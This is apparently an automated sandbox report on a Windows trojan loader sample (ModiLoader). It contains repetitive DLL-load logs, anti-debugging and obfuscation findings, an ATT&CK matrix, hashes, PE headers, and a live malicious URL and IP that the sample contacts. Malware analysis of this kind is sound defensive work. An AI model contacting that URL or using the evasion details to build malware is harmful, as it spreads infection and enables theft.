            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: JDQS879kiy.exeStatic file information: File size 1161216 > 1048576

            Data Obfuscation

            Source: Yara matchFile source: 0.2.JDQS879kiy.exe.23565a8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.JDQS879kiy.exe.2840000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.JDQS879kiy.exe.23565a8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2622490407.0000000002356000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2636506576.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02858798
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028432FC push eax; ret 0_2_02843338
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D2FC push 0286D367h; ret 0_2_0286D35F
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284635C push 028463B7h; ret 0_2_028463AF
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284635A push 028463B7h; ret 0_2_028463AF
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D0AC push 0286D125h; ret 0_2_0286D11D
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D1F8 push 0286D288h; ret 0_2_0286D280
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D144 push 0286D1ECh; ret 0_2_0286D1E4
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028586B8 push 028586FAh; ret 0_2_028586F2
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02846736 push 0284677Ah; ret 0_2_02846772
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02846738 push 0284677Ah; ret 0_2_02846772
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284C4EC push ecx; mov dword ptr [esp], edx0_2_0284C4F1
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284D520 push 0284D54Ch; ret 0_2_0284D544
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284CB6C push 0284CCF2h; ret 0_2_0284CCEA
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285788C push 02857909h; ret 0_2_02857901
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028568C6 push 02856973h; ret 0_2_0285696B
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028568C8 push 02856973h; ret 0_2_0285696B
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285E9E8 push ecx; mov dword ptr [esp], edx0_2_0285E9ED
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285890E push 02858948h; ret 0_2_02858940
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285A917 push 0285A950h; ret 0_2_0285A948
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858910 push 02858948h; ret 0_2_02858940
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285A918 push 0285A950h; ret 0_2_0285A948
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284C967 push 0284CCF2h; ret 0_2_0284CCEA
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02852EE0 push 02852F56h; ret 0_2_02852F4E
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286BFA0 push 0286C1C8h; ret 0_2_0286C1C0
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02852FEC push 02853039h; ret 0_2_02853031
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02852FEB push 02853039h; ret 0_2_02853031
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02855DFC push ecx; mov dword ptr [esp], edx0_2_02855DFE
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0285A954
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028458B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028458B4
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\JDQS879kiy.exeAPI call chain: ExitProcess graph end nodegraph_0-25837

            Anti Debugging

            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0285F024
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02858798
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02845A78
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: GetLocaleInfoA,0_2_0284A790
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: GetLocaleInfoA,0_2_0284A744
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02845B84
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284918C GetLocalTime,0_2_0284918C
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284B70C GetVersionExA,0_2_0284B70C
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Valid Accounts | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Access Token Manipulation | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 System Network Connections Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 24 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Source | Detection | Scanner | Label | Link
            JDQS879kiy.exe | 79% | Virustotal | | Browse
            JDQS879kiy.exe | 68% | ReversingLabs | Win32.Trojan.ModiLoader |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
            amazonenviro.com | 166.62.27.188 | true | false | | high
            time.windows.com | unknown | unknown | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://amazonenviro.com/245_Nsltarpncon | true | Avira URL Cloud: safe | unknown
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            166.62.27.188 | amazonenviro.com | United States | | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1590518
                      Start date and time:2025-01-14 08:23:08 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 25s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:JDQS879kiy.exe
                      renamed because original name is a hash value
                      Original Sample Name:e9802e45a66c963ced0e7c60c899c5cd.exe
                      Detection:MAL
                      Classification:mal76.troj.evad.winEXE@1/0@2/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 23
                      • Number of non-executed functions: 37
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 104.40.149.189, 13.107.253.45, 52.149.20.212
                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
            Time | Type | Description
            02:24:15 | API Interceptor | 77x Sleep call for process: JDQS879kiy.exe modified
                      • 72.167.84.16
                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.28.135
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e1LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                      • 166.62.27.188
                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                      • 166.62.27.188
                      uo9m.exeGet hashmaliciousLummaCBrowse
                      • 166.62.27.188
                      uo9m.exeGet hashmaliciousLummaCBrowse
                      • 166.62.27.188
                      YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                      • 166.62.27.188
                      msit.exeGet hashmaliciousLummaC StealerBrowse
                      • 166.62.27.188
                      tesr.exeGet hashmaliciousLummaC StealerBrowse
                      • 166.62.27.188
                      No context
                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.188510241840165
TrID:
• Win32 Executable (generic) a (10002005/4) 99.38%
• InstallShield setup (43055/19) 0.43%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name: JDQS879kiy.exe
File size: 1'161'216 bytes
MD5: e9802e45a66c963ced0e7c60c899c5cd
SHA1: cd4eee552fb5b4326f5e1bc2d2b16779639d5efb
SHA256: 3cce82eff14a78c73dbc3f64a7abc6476d9b184763a5f6713ce68d6ee8df75f8
SHA512: 1723dd25dc853d193b4574521b9a0f40e87fa13c2dd74a1d868e8e0d6736ea79c5f0f2896359e555da2da351cbf52b2337956f802e10869eda3c36264143f8b5
SSDEEP: 24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
TLSH: 78359D3790B387FDC17289798F5F9BE4682EA9303928BA52FED17D0D5B242417838197
                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 4f858a8c8e8e8946
Entrypoint: 0x46e80c
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 44c8864bd68c3bff94639c69671ea4b7
                      Instruction
                      push ebp
                      mov ebp, esp
                      add esp, FFFFFFF0h
                      mov eax, 0046D250h
                      call 00007F8ACC7705C1h
                      mov ecx, dword ptr [00470E9Ch]
                      mov eax, dword ptr [00470D8Ch]
                      mov eax, dword ptr [eax]
                      mov edx, dword ptr [0046CB00h]
                      call 00007F8ACC7C6459h
                      mov eax, dword ptr [00470D8Ch]
                      mov eax, dword ptr [eax]
                      call 00007F8ACC7C64CDh
                      call 00007F8ACC76E420h
                      lea eax, dword ptr [eax+00h]
                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x75000 | 0x266e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x82000 | 0xa1c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x7ce8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x79000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x75754 | 0x600 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6c4c0 | 0x6c600 | 69c4173c38ad27686fb46f69fd79ec91 | False | 0.5070961288927336 | data | 6.531494017298441 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x6e000 | 0x848 | 0xa00 | 639613140a642faedd01bff468c3e3cf | False | 0.523828125 | data | 5.552779847613545 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x6f000 | 0x1f40 | 0x2000 | 53b6dd6978c858db7e9faa57954b9c18 | False | 0.3963623046875 | data | 3.804120578626792 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
